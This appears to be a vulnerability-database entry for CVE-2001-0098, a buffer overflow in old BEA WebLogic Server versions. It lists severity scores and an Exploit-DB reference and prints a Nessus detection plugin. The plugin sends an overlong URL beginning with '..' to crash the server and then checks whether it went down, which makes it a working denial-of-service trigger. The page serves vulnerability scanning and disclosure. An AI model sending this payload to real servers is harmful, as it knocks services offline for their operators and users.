Vulnerabilities > CVE-2001-0098 - Buffer Overflow vulnerability in BEA Weblogic Server 4.5.2

047910
CVSS 10.0 - CRITICAL
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
COMPLETE
Integrity impact
COMPLETE
Availability impact
COMPLETE
network
low complexity
bea
critical
nessus
exploit available
NVD
Published: 2001-02-12
Updated: 2017-12-19

Summary

Buffer overflow in Bea WebLogic Server before 5.1.0 allows remote attackers to execute arbitrary commands via a long URL that begins with a ".." string.

Vulnerable Configurations

Part Description Count
Application
Bea
1

Exploit-Db

descriptionBEA Systems Weblogic Server 4.0 x/4.5 x/5.1 x Double Dot Buffer Overflow. CVE-2001-0098. Remote exploits for multiple platform
idEDB-ID:20516
last seen2016-02-02
modified2000-12-19
published2000-12-19
reporterpeter.grundl
sourcehttps://www.exploit-db.com/download/20516/
titleBEA Systems Weblogic Server 4.0 x/4.5 x/5.1 x Double Dot Buffer Overflow

Nessus

NASL familyWeb Servers
NASL idWEBLOGIC_DOTDOTDOS.NASL
descriptionRequesting an overly long URL starting with a double dot can crash certain versions of WebLogic servers or possibly even allow for arbitrary code execution.
last seen2020-06-01
modified2020-06-02
plugin id10697
published2001-06-21
reporterThis script is Copyright (C) 2001-2018 StrongHoldNet
sourcehttps://www.tenable.com/plugins/nessus/10697
titleWebLogic Server Double Dot GET Request Remote Overflow
code
#
# This script was written by Vincent Renardias <[email protected]>
#
# Licence : GPL v2
#

# Changes by Tenable:
# - Revised plugin title (4/13/2009)
# - Added cpe, updated copyright (8/15/2012)
# - Switched to the weblogic detect script, updated copyright (11/23/2015)

include("compat.inc");

if(description)
{
 script_id(10697);
 script_version ("1.34");
 script_cve_id("CVE-2001-0098");
 script_bugtraq_id(2138);

 script_name(english:"WebLogic Server Double Dot GET Request Remote Overflow");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote web server is vulnerable to a buffer overflow attack." );
 script_set_attribute(attribute:"description", value:
"Requesting an overly long URL starting with a double dot can crash
certain versions of WebLogic servers or possibly even allow for
arbitrary code execution." );
 script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2000/Dec/382");
 script_set_attribute(attribute:"solution", value:
"Upgrade to WebLogic 5.1 with Service Pack 7 or later." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "2001/06/21");
 script_set_attribute(attribute:"vuln_publication_date", value: "2000/12/19");
 script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe",value:"cpe:/a:oracle:weblogic_server");
script_end_attributes();

 
 script_summary(english:"WebLogic Server DoS");
 script_category(ACT_DENIAL);
 script_copyright(english:"This script is Copyright (C) 2001-2020 StrongHoldNet");
 script_family(english:"Web Servers");
 script_dependencies("weblogic_detect.nasl");
 script_require_ports("Services/www", 80, 7001);
 script_require_keys("www/weblogic");
 exit(0);
}

#
# The script code starts here
#

include("http_func.inc");
include("misc_func.inc");

get_kb_item_or_exit("www/weblogic");
port = get_http_port(default:80, embedded:TRUE);
get_kb_item_or_exit("www/weblogic/" + port + "/installed");

banner = get_http_banner(port:port);
if (!banner || "WebLogic" >!< banner) exit(0);

if(get_port_state(port))
{
 if(http_is_dead(port:port))exit(0);
 soc = http_open_socket(port);
 if(soc)
 {
  buffer = http_get(item:string("..", crap(10000)), port:port);
  send(socket:soc, data:buffer);
  r = http_recv(socket:soc);
  http_close_socket(soc);
  
  if(http_is_dead(port:port, retry: 2))security_hole(port);
 }
}

References